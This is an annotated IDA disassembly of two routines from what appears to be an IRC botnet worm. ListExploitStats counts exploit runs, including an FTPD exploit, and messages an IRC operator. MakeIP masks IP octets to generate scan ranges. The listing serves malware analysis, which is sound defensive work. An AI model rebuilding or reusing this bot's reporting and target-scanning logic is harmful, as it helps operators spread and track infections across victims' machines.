seg000:00401000 ; seg000:00401000 ; +-------------------------------------------------------------------------+ seg000:00401000 ; ¦ This file is generated by The Interactive Disassembler (IDA) ¦ seg000:00401000 ; ¦ Copyright (c) 2005 by DataRescue sa/nv, <ida@datarescue.com> ¦ seg000:00401000 ; ¦ Licensed to: Sebastian Porst, 1 user std, 05/2005 ¦ seg000:00401000 ; +-------------------------------------------------------------------------+ seg000:00401000 ; seg000:00401000 ; Format : Portable executable for 80386 (PE) seg000:00401000 ; Imagebase : 400000 seg000:00401000 ; Section 1. (virtual address 00001000) seg000:00401000 ; Virtual size : 00016000 ( 90112.) seg000:00401000 ; Section size in file : 00016000 ( 90112.) seg000:00401000 ; Offset to raw data for section: 00001000 seg000:00401000 ; Flags C0000040: Data Readable Writable seg000:00401000 ; Alignment : default seg000:00401000 seg000:00401000 seg000:00401000 unicode macro page,string,zero seg000:00401000 irpc c,<string> seg000:00401000 db '&c', page seg000:00401000 endm seg000:00401000 ifnb <zero> seg000:00401000 dw zero seg000:00401000 endif seg000:00401000 endm seg000:00401000 seg000:00401000 .686p seg000:00401000 .mmx seg000:00401000 .model flat seg000:00401000 seg000:00401000 ; --------------------------------------------------------------------------- seg000:00401000 seg000:00401000 ; Segment type: Pure code seg000:00401000 ; Segment permissions: Read/Write seg000:00401000 seg000 segment para public 'DATA' use32 seg000:00401000 assume cs:seg000 seg000:00401000 ;org 401000h seg000:00401000 assume es:nothing, ss:nothing, ds:seg000, fs:nothing, gs:nothing seg000:00401000 seg000:00401000 ; ¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦ S U B R O U T I N E ¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦ seg000:00401000 seg000:00401000 ; Tally up the number of exploits executed. If the total number of exploits exceeds a certain threshold a user on IRC is messaged. seg000:00401000 ; @param conn An IRC connection seg000:00401000 ; @param target An IRC nick seg000:00401000 ; @param verbose Switches on verbose mode seg000:00401000 ; @param total Exploit threshold seg000:00401000 ; @return - seg000:00401000 ; seg000:00401000 ; Attributes: bp-based frame seg000:00401000 seg000:00401000 ListExploitStats proc near ; CODE XREF: IRC_CommandParse+2B37p seg000:00401000 seg000:00401000 var_410 = dword ptr -410h seg000:00401000 var_20C = dword ptr -20Ch seg000:00401000 var_8 = dword ptr -8 seg000:00401000 var_4 = dword ptr -4 seg000:00401000 conn = dword ptr 8 seg000:00401000 target = dword ptr 0Ch seg000:00401000 verbose = dword ptr 10h seg000:00401000 total = dword ptr 14h seg000:00401000 seg000:00401000 push ebp seg000:00401001 mov ebp, esp seg000:00401003 sub esp, 410h seg000:00401009 and [ebp+var_8], 0 seg000:0040100D push ebx seg000:0040100E push esi seg000:0040100F mov esi, ds:sprintf seg000:00401015 push edi seg000:00401016 push offset aScan ; "SCAN//" seg000:0040101B lea eax, [ebp+var_20C] seg000:00401021 push offset aSExploitStatis ; "%s Exploit Statistics:" seg000:00401026 push eax seg000:00401027 call esi seg000:00401029 mov edi, ds:strncat seg000:0040102F add esp, 0Ch seg000:00401032 cmp ds:exploit.port, 0 seg000:00401039 mov ebx, 202h seg000:0040103E jz short loc_401093 seg000:00401040 mov [ebp+var_4], offset exploit.name seg000:00401047 seg000:00401047 @This loop sums up the exploit stats seg000:00401047 seg000:00401047 loc_401047: ; CODE XREF: ListExploitStats+91j seg000:00401047 push offset aBanner ; "banner" seg000:0040104C push [ebp+var_4] seg000:0040104F call ds:dword_4170D0 seg000:00401055 test eax, eax seg000:00401057 jz short loc_401086 seg000:00401059 mov ecx, [ebp+var_4] seg000:0040105C mov eax, [ecx+29h] seg000:0040105F add [ebp+var_8], eax seg000:00401062 push eax seg000:00401063 push ecx seg000:00401064 lea eax, [ebp+var_410] seg000:0040106A push offset aSD ; " %s: %d," seg000:0040106F push eax seg000:00401070 call esi seg000:00401072 lea eax, [ebp+var_410] seg000:00401078 push ebx seg000:00401079 push eax seg000:0040107A lea eax, [ebp+var_20C] seg000:00401080 push eax seg000:00401081 call edi seg000:00401083 add esp, 1Ch seg000:00401086 seg000:00401086 loc_401086: ; CODE XREF: ListExploitStats+57j seg000:00401086 add [ebp+var_4], 40h seg000:0040108A mov eax, [ebp+var_4] seg000:0040108D cmp dword ptr [eax+21h], 0 seg000:00401091 jnz short loc_401047 seg000:00401093 seg000:00401093 loc_401093: ; CODE XREF: ListExploitStats+3Ej seg000:00401093 push 0 seg000:00401095 push ds:dword_43D044 seg000:0040109B call ds:dword_4170D0 seg000:004010A1 push eax seg000:004010A2 call Uptime seg000:004010A7 add esp, 0Ch seg000:004010AA push eax seg000:004010AB lea eax, [ebp+var_410] seg000:004010B1 push [ebp+var_8] seg000:004010B4 push ds:dword_43D000 seg000:004010BA push offset aExploitFtpdDTo ; " Exploit FTPD: %d, Total: %d in %s." seg000:004010BF push eax seg000:004010C0 call esi seg000:004010C2 lea eax, [ebp+var_410] seg000:004010C8 push ebx seg000:004010C9 push eax seg000:004010CA lea eax, [ebp+var_20C] seg000:004010D0 push eax seg000:004010D1 call edi seg000:004010D3 mov eax, [ebp+var_8] seg000:004010D6 add esp, 20h seg000:004010D9 cmp eax, [ebp+total] seg000:004010DC pop edi seg000:004010DD pop esi seg000:004010DE pop ebx seg000:004010DF jg short loc_4010E7 seg000:004010E1 cmp [ebp+verbose], 0 seg000:004010E5 jz short locret_4010FC seg000:004010E7 seg000:004010E7 @Message the user if the treshold was met or verbose mode is on seg000:004010E7 seg000:004010E7 loc_4010E7: ; CODE XREF: ListExploitStats+DFj seg000:004010E7 lea eax, [ebp+var_20C] seg000:004010ED push eax seg000:004010EE push [ebp+target] seg000:004010F1 push [ebp+conn] seg000:004010F4 call IRC__privmsg seg000:004010F9 add esp, 0Ch seg000:004010FC seg000:004010FC locret_4010FC: ; CODE XREF: ListExploitStats+E5j seg000:004010FC leave seg000:004010FD retn seg000:004010FD ListExploitStats endp seg000:004010FD seg000:0040129B seg000:0040129B ; ¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦ S U B R O U T I N E ¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦ seg000:0040129B seg000:0040129B ; Takes an IP address and sets some parts of it to either x or 0 seg000:0040129B ; @param ip An IP address seg000:0040129B ; @param Random If true, parts of the IP address are replaced by 'x', otherwise by 0. seg000:0040129B ; @param Class IP Class of the generated IP seg000:0040129B ; @return The generated IP address seg000:0040129B ; Attributes: bp-based frame seg000:0040129B seg000:0040129B MakeIP proc near ; CODE XREF: IRC_CommandParse+239Cp seg000:0040129B ; IRC_CommandParse+289Cp seg000:0040129B seg000:0040129B var_20 = dword ptr -20h seg000:0040129B var_10 = dword ptr -10h seg000:0040129B var_C = dword ptr -0Ch seg000:0040129B var_8 = dword ptr -8 seg000:0040129B arg_0 = dword ptr 8 seg000:0040129B arg_4 = dword ptr 0Ch seg000:0040129B arg_8 = dword ptr 10h seg000:0040129B seg000:0040129B push ebp seg000:0040129C mov ebp, esp seg000:0040129E sub esp, 20h seg000:004012A1 cmp [ebp+arg_0], 0 seg000:004012A5 push ebx seg000:004012A6 push esi seg000:004012A7 push edi seg000:004012A8 jz loc_4013A1 seg000:004012AE push 10h seg000:004012B0 push 0 seg000:004012B2 push offset unk_428944 seg000:004012B7 call ZeroMemory seg000:004012BC push 10h seg000:004012BE lea eax, [ebp+var_20] seg000:004012C1 push [ebp+arg_0] seg000:004012C4 push eax seg000:004012C5 call ds:dword_4171E0 seg000:004012CB mov esi, ds:dword_4171E4 seg000:004012D1 mov edi, offset a__0 ; "." seg000:004012D6 lea eax, [ebp+var_20] seg000:004012D9 push edi seg000:004012DA push eax seg000:004012DB call esi seg000:004012DD add esp, 20h seg000:004012E0 mov [ebp+var_10], eax seg000:004012E3 test eax, eax seg000:004012E5 jz loc_4013A1 seg000:004012EB mov [ebp+arg_0], 1 seg000:004012F2 lea ebx, [ebp+var_C] seg000:004012F5 seg000:004012F5 @Tokenize the input IP address seg000:004012F5 seg000:004012F5 loc_4012F5: ; CODE XREF: MakeIP+77j seg000:004012F5 push edi seg000:004012F6 push 0 seg000:004012F8 call esi seg000:004012FA xor edx, edx seg000:004012FC pop ecx seg000:004012FD cmp eax, edx seg000:004012FF pop ecx seg000:00401300 mov [ebx], eax seg000:00401302 jz loc_4013A1 seg000:00401308 inc [ebp+arg_0] seg000:0040130B add ebx, 4 seg000:0040130E cmp [ebp+arg_0], 4 seg000:00401312 jl short loc_4012F5 seg000:00401314 cmp [ebp+arg_8], 1 seg000:00401318 seg000:00401318 @Create a class 1 IP seg000:00401318 seg000:00401318 jnz short loc_401343 seg000:0040131A cmp [ebp+arg_4], edx seg000:0040131D mov ecx, offset asc_41981C ; "x" seg000:00401322 mov eax, offset a0 ; "0" seg000:00401327 mov esi, ecx seg000:00401329 jnz short loc_40132D seg000:0040132B mov esi, eax seg000:0040132D seg000:0040132D loc_40132D: ; CODE XREF: MakeIP+8Ej seg000:0040132D cmp [ebp+arg_4], edx seg000:00401330 mov edx, ecx seg000:00401332 jnz short loc_401336 seg000:00401334 mov edx, eax seg000:00401336 seg000:00401336 loc_401336: ; CODE XREF: MakeIP+97j seg000:00401336 cmp [ebp+arg_4], 0 seg000:0040133A jz short loc_40133E seg000:0040133C mov eax, ecx seg000:0040133E seg000:0040133E loc_40133E: ; CODE XREF: MakeIP+9Fj seg000:0040133E push esi seg000:0040133F push edx seg000:00401340 push eax seg000:00401341 jmp short loc_401384 seg000:00401343 ; --------------------------------------------------------------------------- seg000:00401343 @Create a class 2 IP seg000:00401343 seg000:00401343 loc_401343: ; CODE XREF: MakeIP+7Dj seg000:00401343 cmp [ebp+arg_8], 2 seg000:00401347 jnz short loc_401368 seg000:00401349 cmp [ebp+arg_4], edx seg000:0040134C mov ecx, offset asc_41981C ; "x" seg000:00401351 mov eax, offset a0 ; "0" seg000:00401356 mov edx, ecx seg000:00401358 jnz short loc_40135C seg000:0040135A mov edx, eax seg000:0040135C seg000:0040135C loc_40135C: ; CODE XREF: MakeIP+BDj seg000:0040135C cmp [ebp+arg_4], 0 seg000:00401360 jz short loc_401364 seg000:00401362 mov eax, ecx seg000:00401364 seg000:00401364 loc_401364: ; CODE XREF: MakeIP+C5j seg000:00401364 push edx seg000:00401365 push eax seg000:00401366 jmp short loc_401381 seg000:00401368 ; --------------------------------------------------------------------------- seg000:00401368 @Create a class 3 IP seg000:00401368 seg000:00401368 loc_401368: ; CODE XREF: MakeIP+ACj seg000:00401368 cmp [ebp+arg_8], 3 seg000:0040136C jnz short loc_4013A1 seg000:0040136E cmp [ebp+arg_4], edx seg000:00401371 mov eax, offset asc_41981C ; "x" seg000:00401376 jnz short loc_40137D seg000:00401378 mov eax, offset a0 ; "0" seg000:0040137D seg000:0040137D loc_40137D: ; CODE XREF: MakeIP+DBj seg000:0040137D push eax seg000:0040137E push [ebp+var_8] seg000:00401381 seg000:00401381 loc_401381: ; CODE XREF: MakeIP+CBj seg000:00401381 push [ebp+var_C] seg000:00401384 seg000:00401384 loc_401384: ; CODE XREF: MakeIP+A6j seg000:00401384 push [ebp+var_10] seg000:00401387 push offset aS_S_S_S ; "%s.%s.%s.%s" seg000:0040138C push offset unk_428944 seg000:00401391 call ds:sprintf seg000:00401397 add esp, 18h seg000:0040139A mov eax, offset unk_428944 seg000:0040139F jmp short loc_4013A3 seg000:004013A1 ; --------------------------------------------------------------------------- seg000:004013A1 seg000:004013A1 loc_4013A1: ; CODE XREF: MakeIP+Dj seg000:004013A1 ; MakeIP+4Aj ... seg000:004013A1 xor eax, eax seg000:004013A3 seg000:004013A3 loc_4013A3: ; CODE XREF: MakeIP+104j seg000:004013A3 pop edi seg000:004013A4 pop esi seg000:004013A5 pop ebx seg000:004013A6 leave seg000:004013A7 retn seg000:004013A7 MakeIP endp seg000:004013A7